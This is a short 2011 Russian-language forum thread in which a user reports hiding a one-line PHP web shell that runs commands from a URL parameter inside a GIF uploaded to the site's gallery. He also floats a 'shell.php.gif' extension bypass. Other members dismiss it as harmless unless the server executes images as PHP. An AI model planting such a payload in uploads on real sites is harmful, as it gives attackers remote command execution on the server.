Уязвимость - шелл

Автопокупка рекламы
Печать RSS
266
Удаленный 19.02.2011 / 23:42 Автор
Дух
0
нечего взламывать не хотел, просто проверил, по этому тут рассказываю

открыл я файл test.gif блокнотом и добавил в самый конец :
<?php system($_GET["cmd"]); ?>
залил картинку на сайт тут: http://visavi.net/gallery/?
- http://visavi.net/gallery/index.php?act=showimg&gid=675&start=0&
можно еще такое на аватаре проверить.

может это уязвимость? может надо что бы сайт фильтровал бы содержимое картинки, или аватара ???
Lugaro 20.02.2011 / 03:45
ツ ツ ツ
0
Не уязвимомоть это и проверку делать нет смысла, всеравно не чем это не грозит, просто банан таким выдавать кто гадит в галерее, а картинку я снес т.к увидел её раньше чем эту тему
N
Neformat 20.02.2011 / 04:04
Голубые штаны
0
С каких пор gif как php выполняется? Руки оторвать за такие настройки сервера
Вантуз-мен 20.02.2011 / 05:41
Господин ПЖ
0
я ничего не понял, что было-то?
Андрей 20.02.2011 / 07:40
Голубые штаны
0
нету там уязвимости... вот аватар мой например)
<?php echo "Hello world"; ?> написал и пофигу

Добавлено через 00:51 сек.
4: Vantuz, внешне, прозрачная картинка была
J
JustZero 20.02.2011 / 10:57
Оранжевые штаны
0
1. Askme, работать не бут, пока в httacess не пропиш чеб картинку исполняло как пхп скрипт
Удаленный 20.02.2011 / 17:13 Автор
Дух
0
Абабагаламага. да, может картинка исполняет, а если например обойти расширение. shell.php.gif ???
А
Александр 20.02.2011 / 17:22
Оранжевые штаны
0
8, лучше гугл сломай.
K
KOZZ 20.02.2011 / 17:37
Транклюкаторщик
0
кулхацкер ))
Удаленный 21.02.2011 / 20:08 Автор
Дух
0
Прикольные тут теги smile ) не реклама
Стикеры / Теги / Правила / Топ тем / Топ постов / Поиск